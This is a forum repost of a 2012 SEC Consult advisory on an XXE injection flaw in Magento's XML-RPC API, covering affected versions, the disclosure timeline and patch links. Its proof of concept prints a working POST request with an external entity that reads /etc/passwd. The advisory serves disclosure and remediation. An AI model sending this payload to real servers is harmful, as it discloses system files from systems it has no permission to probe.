Jump to content
net3design

Magento eCommerce Local File Disclosure

Recommended Posts

Posted

SEC Consult Vulnerability Lab Security Advisory < 20120712-0 >

=======================================================================

title: Local file disclosure via XXE injection

product: Magento eCommerce Platform

Enterprise & Community Edition

vulnerable version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.1

Magento eCommerce Platform Community Edition <= v1.7.0.1

fixed version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.2

Magento eCommerce Platform Community Edition <= v1.7.0.2

impact: Critical

homepage: Ecommerce Software & Ecommerce Platform Solutions | Magento

found: 2012-06-18

by: K. Gudinavicius

SEC Consult Vulnerability Lab

https://www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"Magento eCommerce Platforms provide the scalability, flexibility and features

for business growth. Magento provides feature-rich eCommerce platforms that

offer merchants complete flexibility and control over the presentation,

content, and functionality of their online channel."

Source: Online Shopping Cart Software | Magento

magento-ecommerce-banner.jpg

Vulnerability overview/description:

-----------------------------------

Magento eCommerce platform uses a vulnerable version of Zend framework which

is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class

of Zend framework (SimpleXML PHP extension) is used in an insecure way to

parse XML data. External entities can be specified by adding a specific

DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an

application may be coerced to open arbitrary files and/or TCP connections.

Proof of concept:

-----------------

Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)

to handle XML-RPC requests. Hence it is possible to disclose arbitrary local

files from the remote system. The following HTTP POST request to the

vulnerable XmlRpc server application illustrates the exploitation of this

vulnerability:



POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>


Vulnerable / tested versions:

-----------------------------

Magento eCommerce Platform Enterprise Edition v1.10.1.1

Magento eCommerce Platform Community Edition v1.7.0.0 & v1.7.0.1

Earlier versions are probably affected too!

Vendor contact timeline:

------------------------

2012-06-18: Contacting vendor through the contact form on the webpage as no email

addresses or security contacts are to be found

Magento - Contact Us - eCommerce Software for Growth

2012-06-20: No reply so far, hence trying again by choosing a different contact

reason.

2012-06-21: Creating a bug tracking entry, asking for security contact

Magento - Report a Bug - eCommerce Software for Growth.

2012-06-21: Vendor reply: security@magento.com should be used.

2012-06-22: Sending advisory draft.

2012-06-22: Vendor reply: Testing workaround for customers to disable XMLRPC

functionality, patch in progress; vendor will improve website to

provide a clearer, more direct method for researchers.

2012-06-25: Asking for affected versions and release timeline.

2012-06-26: Informing Magento about Zend framework advisory.

2012-06-27: Vendor: sending more information to SEC Consult soon.

2012-07-04: Asking vendor about status.

2012-07-05: Vendor releases new versions and patches.

2012-07-12: SEC Consult releases detailed advisory.

Solution:

---------

Magento Community Edition

* 1.7.0.0+ - Upgrade to the latest version, currently v1.7.0.2:

Open Source Ecommerce Software & Solutions | Magento

* 1.4.0.0 - 1.4.1.1 - Apply the patch

http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.0.0-1.4.1.1.patch

* 1.4.2.0 - Apply the patch

http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.2.0.patch

* 1.5.0.0 - 1.7.0.1 - Apply the patch

http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.5.0.0-1.7.0.1.patch

Magento Enterprise Edition

* 1.12.0.0+ - Upgrade to the latest version, currently v1.12.0.2:

https://www.magentocommerce.com/products/customer/account/index/

* 1.8.0.0 – 1.11.X.X - Apply the Zend Security Upgrades patch

https://www.magentocommerce.com/products/customer/account/index/

Magento Professional Edition

* All versions - Apply the Zend Security Upgrades patch

https://www.magentocommerce.com/products/customer/account/index/

More information can be found at:

Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth

Workaround:

-----------

Detailed steps can be found at:

Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...